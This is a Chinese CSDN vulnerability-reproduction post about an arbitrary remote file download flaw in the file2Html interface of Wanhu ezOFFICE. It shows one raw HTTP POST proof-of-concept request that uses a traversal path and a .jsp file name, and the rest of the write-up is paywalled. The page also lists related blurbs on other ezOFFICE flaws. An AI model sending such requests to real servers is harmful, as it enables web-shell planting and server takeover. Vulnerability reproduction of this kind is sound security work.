万户ezOFFICE file2Html接口任意文件远程下载

最新推荐文章于 2024-07-13 15:23:40 发布
最新推荐文章于 2024-07-13 15:23:40 发布
阅读量48 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136503005
版权

漏洞描述

万户OA(Office Automation)是一款企业级协同办公管理软件,旨在为企业提供全面的办公自动化解决方案。 万户ezOFFICE file2Html接口存在任意文件远程下载漏洞。攻击者可以通过此漏洞下载任意文件到目标服务器,导致攻击者可获取服务器控制权限。

漏洞复现

  1. 下载文件,fileName参数存在13位字节限制。
POST /defaultroot/yzConvertFile/file2Html.controller HTTP/1.1
Host: xxxxx
Content-Length: 144
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: LocLan=zh_CN; OASESSIONID=30170ED4FFE28967E72103EFFDFE11FA
Connection: close

fileName=1111111111112.jsp&path=../platform/portal/&
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
万户OA downloadhttp任意文件下载漏洞复现 CNVD-2016-06898
afei001
01-03 999
万户OA是集协同软件、门户网站、ERP、CRM、HR、财务、电子邮件、视频会议的功能的一种综合性办公系统。该产品存在任意文件下载漏洞,攻击者可利用漏洞下载服务器系统任意文件,获取系统敏感信息,造成敏感信息泄露。
万户OA downloadhttp任意文件下载漏洞分析与自动化验证脚本 CNVD-2016-06898
afei001
01-03 1856
万户OA downloadhttp任意文件下载漏洞分析与自动化验证脚本 CNVD-2016-06898
漏洞复现】万户-ezOFFICE DownloadServlet 任意文件下载漏洞
凝聚力安全团队
06-21 263
万户OA-ezOFFICE DownloadServlet 接口存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。万户软件网络是业内普遍认可的智慧政务办公专家,OA系统国家行业标准编制组长单位,协同软件国家行业标准编制组长单位,22年专注协同管理领域.为您提供定制化的智慧政务一体化办公解决方案。
漏洞复现】万户OA file2Html.controller 远程文件下载漏洞(RCE)
sheep_qm的博客
01-30 465
万户OAOffice Automation)是一款企业级协同办公管理软件,旨在为企业提供全面的办公自动化解决方案。 万户ezOFFICE存在任意文件上传漏洞。攻击者可以通过该远程下载任意文件到目标服务器,导致攻击者可获取服务器控制权限。
漏洞复现】万户-ezOFFICE download_ftp.jsp 任意文件下载漏洞
凝聚力安全团队
06-22 372
万户OA-ezOFFICE download_ftp.jsp 接口存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。万户软件网络是业内普遍认可的智慧政务办公专家,OA系统国家行业标准编制组长单位,协同软件国家行业标准编制组长单位,22年专注协同管理领域.为您提供定制化的智慧政务一体化办公解决方案。
任意文件下载漏洞
pigzlfa的博客
07-05 1534
定义: 文件下载漏洞是指文件下载功能没有对下载文件类型,目录做合理严谨的过滤,导致用户可以下载服务器上的任意文件 利用: 获得站点源码(黑盒->白盒) 获得站点与中间件配置文件 获得应用与系统配置文件(ssh、myaql) 防御: 1、下载路径不可控,而是程序自动生成后保存在数据库中,根据ID进行下载 2、对参数做严格的过滤,不能进行目录遍历(穿越) 实验目标 通过实验获得系统根目录下flag.php里面key的内容。 key内容为DBApp{}内的字符串 点进下载地址,跳转到下载页面 在地址栏
万户OA text2Html接口存在任意文件读取漏洞
3tefanie丶zhou的博客
12-19 816
【一个人要有多少血性才算是个好人?】
万户ezOFFICE数据字典
04-02
万户ezOFFICE数据字典
ezOFFICE安装手册(linux版).doc
11-30
6. 建立第二个交换分区,需要进行说明,建立交换分区时挂载点不进行选择,在文件系统类型中选择 swap,大小一般设置为物理内存容量的 1~2 倍,物理内存越大相应的 swap 一般设置倍数就较小,例如1G 内存设置 swap 为...
EzOffice.exe
06-14
Ashetch GPS数据格式转换,导入导出软件
万户OA启动会PPT教案.pptx
10-02
万户OA启动会PPT教案】是一份详细阐述如何启动和实施万户OAezOffice)协同办公系统的专业课件。该课件分为五个章节,详细介绍了项目从规划到执行的全过程。 第一章,项目总体规划及实施阶段步骤,明确了项目...
ezOFFICE协同管理平台使用手册_1.pdf
09-26
ezOFFICE协同管理平台使用手册》是一份详细介绍如何有效使用黑龙江农信协同办公平台的指南,涵盖了系统登录与退出、信息管理、公文管理、内部邮件等多个关键功能。以下是对这些内容的详细阐述: 1. **登录和退出...
如何用IP地址申请SSL证书实现网络安全
2401_84891336的博客
07-10 373
申请IP地址SSL证书
网络安全防御【防火墙安全策略用户认证综合实验】
miss_copper的博客
07-10 1229
先新建一个管理员角色(网络安全管理员):再新建一个管理员(用户名密码自拟):至此本实验全部结束!!!
智能车存在网络安全隐患,如何应设计出更好的安全防护技术?
tigerman20201的博客
07-13 167
然而,高度的网络化和智能化也使智能车面临着严峻的网络安全挑战,如远程攻击、数据泄露和恶意控制等。未来,随着技术的不断发展,应持续加强对智能车网络安全的研究和创新,以应对不断变化的安全威胁。摘要:随着智能车技术的迅速发展,车辆的网络连接性不断增强,然而这也带来了诸多网络安全隐患。本文深入探讨了智能车面临的网络安全威胁,并提出了一系列创新的安全防护技术设计,旨在为智能车的安全运行提供更可靠的保障。黑客可以通过公共网络对智能车的通信系统进行攻击,干扰车辆的正常运行,甚至获取车辆的控制权。
网络安全防御【防火墙NAT智能选举综合实验】
miss_copper的博客
07-13 811
需要新创建一个源地址转池:这里我们将配置黑洞路由勾选(防止路由环路,还可以引入到OSPF等动态路由协议中发布出去),允许端口地址转换取消勾选(因为我们这里是多对多的NAT,源NAT地址转换,如果勾选了端口地址转换,就成了端口映射,成了目标NAT)这种方式可以提高安全性,因为攻击者无法预测目标设备的确切IP地址。首先修改公网client5,和分公司server5和client6的域名服务器地址,并且公网中的server4(NDS服务器)开启DNS服务,和分公司的server5开启http服务器。
java配置nginx网络安全,防止国外ip访问,自动添加黑名单,需手动重新加载nginx
最新发布
weixin_44006009的博客
07-13 131
创建一个类,自己添加一个main启动类即可测试。通过访问日志自动添加国外ip黑名单。
【网络安全】APDCL:IDOR + 账户接管
等风来
07-13 585
APDCL ,即印度阿萨姆邦电力分销公司(Assam Power Distribution Company Limited),是印度阿萨姆邦政府控制的公共部门企业,负责电力分配和供应服务,确保电力供应的稳定性和可靠性,以满足居民、工业和商业客户的电力需求。
万户 ezoffice 文件上传漏洞复现
12-17
万户ezoffice是一个办公软件,用于处理各种办公文档。文件上传漏洞是指系统存在一个安全漏洞,允许攻击者在上传文件时注入恶意代码或者上传非法文件到服务器中。这个问题的产生可能是开发过程中没有充分考虑安全性,或者是没有对用户上传的文件进行正确的校验和过滤操作。 想要复现这个漏洞,可以按照以下步骤进行: 1. 准备一个万户ezoffice的测试环境,包括安装相关软件和配置服务器环境。 2. 创建一个测试账号,并登录到系统中。 3. 在系统中找到文件上传的功能,并尝试上传一个文件。可以选择一个存在恶意代码的文件,例如一个带有JavaScript注入的HTML文件。 4. 观察系统的反应。如果文件上传成功,并且系统没有对文件进行正确的处理和过滤,那么就证明存在文件上传漏洞。 5. 尝试利用漏洞进行攻击,可以尝试上传一个病毒文件,或者注入一段恶意代码到服务器中。 6. 观察系统的反应和功能是否受到影响,以及漏洞的程度和影响范围。 在复现漏洞后,可以通过以下方法来修复和防止这个漏洞: 1. 对用户上传的文件进行严格的校验和过滤,确保只有合法的文件和内容能够被上传和处理。 2. 对文件内容进行安全扫描和检测,以防止上传病毒文件或者含有恶意代码的文件。 3. 在文件上传的功能上添加访问控制和权限验证,确保只有经过认证的用户才能进行文件上传操作。 4. 定期对系统进行安全审计和漏洞扫描,及时发现和修复潜在的安全问题。 5. 提高开发人员的安全意识和安全知识,确保在软件开发和设计中充分考虑安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值